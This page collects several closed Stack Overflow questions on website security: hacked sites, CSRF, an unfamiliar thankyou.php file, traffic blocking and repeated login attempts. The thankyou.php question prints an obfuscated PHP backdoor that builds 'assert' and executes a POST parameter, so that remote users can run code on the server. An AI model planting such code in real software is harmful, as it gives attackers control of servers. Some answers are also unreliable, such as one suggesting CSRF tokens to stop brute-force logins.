Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 1 year ago.
Improve this question
Recently I have a few websites frequently being hacked by hacker. Once it is being hacked, the hacker will upload a series of "hacker" files into the server root folder. After I cleaned the website, it will happen again several months later. This happen repeat again and again.
The problem is I don't know how the website is being hacked. Is it possible for us to use Laravel log to do the tracing of hacking? If yes, how can we do it?
Your problem sounds like XSS issues: cross-scripting via any kind of input fields or parameters passed in the URL and/or form POST that are not protected.
The other aspect if to check if the different passwords are strong enough.
Related
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 5 years ago.
Improve this question
Recently I have read about CSRF attacks on websites. I want know more about CSRF attacks on websites and its prevention methods. Help me to find out more about this.
Many thanks in advance
CSRF stands for Cross Site Request Forgery. I'll explain with an example.
Consider you have built a form for users to fill in on your website. What if the same form is copied by miscreants and used on their website? How would you know the form that is submitted is the legitimate one and submitted from your own website? This is called CSRF. There are few methods that can be used to prevent such forgeries. You may find some solutions here:
https://www.wikihow.com/Prevent-Cross-Site-Request-Forgery-(CSRF)-Attacks-in-PHP
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 6 years ago.
Improve this question
I was uploading a file to my web hosting and noticed that a file called thankyou.php has appeared. I don't recall ever having seen this file or this code before. Alarmingly, the file, plus my favicon have last modified times four hours after I would have been making changes.
Can you advise me on whether the code below means anything? note the spaces after the last character of each line. It's been so long since I dabbled in php, and it was just a dabble.
<?php
#$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
#$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
#$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
This can only be an infection in your files. This might not even be the only one. The best thing you can do is check all your files on this sort of infections.
If you have done that, change all your passwords like FTP and database.
Whatever you do, DO NOT change password BEFORE checking the files. They may have made something to get your password changes (PHP mostly).
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 5 years ago.
Improve this question
Is there any way to determining profile visitors in Instagram?
if answer is no, how this app doing this.
Is there any way to determining profile visitors in Instagram?
No. There is no sign of anything that would allow that in the API documentation
if answer is no, how this app doing this.
It appears to generate fake data in order to scam people.
From the page itself:
InstaView calculates all your Instagram activity and get data for each users who has interacted with you recently.
You can't really tell what this app actually "calculates". Beside that it says "most accurate way to find out Who Viewed Your Profile" which shows that determining the exact amount probably isn't possible at all ..
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 8 years ago.
Improve this question
My website's traffic increases suddenly in a high rate. I checked my visitors list and found static.reverse.softlayer.com. This has been happening for last few weeks but I did not notice it then. I searched about static.reverse.softlayer.com and found horrible stories. How can I prevent anything like static.reverse.softlayer.com (if it is liable) which increases traffic.
I am also worried about my website's security. Please help me.
This is a company which creates just a lot of traffic, block it via .htaccess
deny from 5.10.83.0/25
To add some information: the IP-Range 5.10.83.0 - 5.10.83.127 is owned by softlayer.com, but used by ahrefs.com. And this is a SEO service which checks websites for money or smthg, im not rly sure, but the best decision you can do is block iz.
Other Softlayer IPs
50.22.0.0/15
50.97.0.0/16
66.228.112.0/20
67.228.0.0/16
74.86.0.0/16
75.126.0.0/16
173.192.0.0/15
174.36.0.0/15
208.43.0.0/16
208.101.0.0/18
108.168.128.0/17
159.253.128.0/19
It's up to you to restrict them all or not.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
I periodically check my apache domlog to check for anomalies in GET and POST requests. Earlier today I noticed the same POST request to a login php happening once and sometimes twice a second for 2-3 hours from the same IP. I am assuming it is someone trying to hack into an account.
So the question is: What is the best way to guard against this? I could blacklist the IP but I notice some people advise against this, since the IP could be dynamically changing. Is there a better way?
implement some form of cross-site request forgery in php wherein you include a random string token generated for each session in the form. this makes login requests invalid if the token generated by your server is not included in the request.